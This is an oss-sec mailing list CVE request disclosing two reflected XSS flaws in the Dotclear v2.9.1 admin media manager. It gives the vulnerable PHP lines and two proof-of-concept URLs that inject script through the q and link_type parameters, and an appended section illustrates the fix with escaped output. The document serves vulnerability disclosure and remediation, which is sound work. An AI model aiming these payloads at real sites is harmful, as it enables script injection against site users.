oss-sec mailing list archives

CVE request: XSS vulns in Dotclear v2.9.1


From: 陈瑞琦 <chenruiqi () 360 cn>
Date: Tue, 2 Aug 2016 06:13:03 +0000

I found some XSS vulns in Dotclear v2.9.1

Title: XSS vulns in Dotclear v2.9.1
Author: Chen Ruiqi, Chenruiqi () 360 cn
Date: 2016-08-01
Download Site: https://dotclear.org/download
Vendor: dotclear.org
Vendor Notified: 2016-08-01
Vendor Contact: security () dotclear net
--------------------------------------------------------------------------------------------------------
Description:
Dotclear is an open source blog publishing application distributed under the GNU GPLv2. Developed originally by Olivier 
Meunier from 2002, Dotclear has now attracted a solid team of developers.[2] It is relatively popular in French 
speaking countries, where it is used by several major blogging platforms (Gandi Blogs,[3] Marine nationale,[4] 
etc.).(Wiki)
-----------------------------------------------------------------------------------------------------------
Vulnerability:
There are two reflected XSS vulns in the Dotclear v2.9.1 media manager.

/admin/media.php
line 34 $link_type = !empty($_REQUEST['link_type']) ? $_REQUEST['link_type'] : null;
line 62 $q = isset($_REQUEST['q']) ? $_REQUEST['q'] : null;

Lack of filtering before putting the user input into the page.
--------------------------------------------------------------------------------------------------------
PoC Code:
http://*.*.*.*/dotclear/admin/media.php?q=77777%3C%2Fspan%3E%3Cscript%3Ealert(1)%3C/script%3E&popup=0&select=0&plugin_id=&post_id=&link_type=
http://*.*.*.*/dotclear/admin/media.php?q=77777&popup=0&select=0&plugin_id=&post_id=&link_type=8888%22%3E%3Cscript%3Ealert(1)%3C/script%3E
----------------------------------------------------------------------------------------------------------
Fix Code:
https://hg.dotclear.org/dotclear/rev/40d0207e520d


Could you assign CVE IDs for these?

Thank you

Chen Ruiqi
Codesafe Team

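The two PoC URLs above inject into different HTML contexts: the `q` payload opens with `</span>`, so that value is reflected as element text, while the `link_type` payload opens with `">`, so that value is reflected inside a quoted attribute. The following PHP is an added illustration, not Dotclear's code and not the linked changeset: the surrounding markup, the function names and the use of plain `htmlspecialchars()` are assumptions chosen to show the vulnerable pattern the advisory describes next to a hardened form that escapes for both contexts. Read the linked Mercurial revision for the project's actual fix.

```php
<?php
// Added example, not Dotclear's code. The markup below is assumed for
// illustration and is not taken from admin/media.php.

// Constructed inputs mirroring the advisory's two PoC payloads (URL-decoded).
$q         = '77777</span><script>alert(1)</script>';
$link_type = '8888"><script>alert(1)</script>';

// Vulnerable pattern: raw $_REQUEST values concatenated straight into HTML,
// as the advisory describes for lines 34 and 62 of admin/media.php.
// $q lands in element text, $link_type in a double-quoted attribute.
function render_vulnerable(string $q, string $link_type): string
{
    $html  = '<span class="search-term">' . $q . '</span>';
    $html .= '<input type="hidden" name="link_type" value="' . $link_type . '">';
    return $html;
}

// Hardened form: every request value is escaped before it is emitted.
// ENT_QUOTES encodes both " and ', so one helper is safe for element text and
// for single- or double-quoted attribute values. ENT_SUBSTITUTE makes invalid
// UTF-8 produce U+FFFD instead of an empty string, which would otherwise
// silently drop the whole value.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_hardened(string $q, string $link_type): string
{
    $html  = '<span class="search-term">' . esc($q) . '</span>';
    $html .= '<input type="hidden" name="link_type" value="' . esc($link_type) . '">';
    return $html;
}

// Quick check: does a literal <script> tag reach the page? With escaping the
// payloads are rendered as text (&lt;script&gt;) and the attribute is not
// broken out of, because " has become &quot;.
$outputs = [
    'vulnerable' => render_vulnerable($q, $link_type),
    'hardened'   => render_hardened($q, $link_type),
];
foreach ($outputs as $label => $out) {
    $verdict = strpos($out, '<script>') !== false
        ? 'script tag reaches the page'
        : 'script tag neutralised';
    echo str_pad($label, 12) . ': ' . $verdict . PHP_EOL;
    echo $out . PHP_EOL . PHP_EOL;
}
```

Because the values come from `$_REQUEST`, a GET link is enough to deliver either payload, which is what makes these reflected rather than stored issues; escaping at the point of output, as in `render_hardened()`, is the check to look for when reviewing the fix.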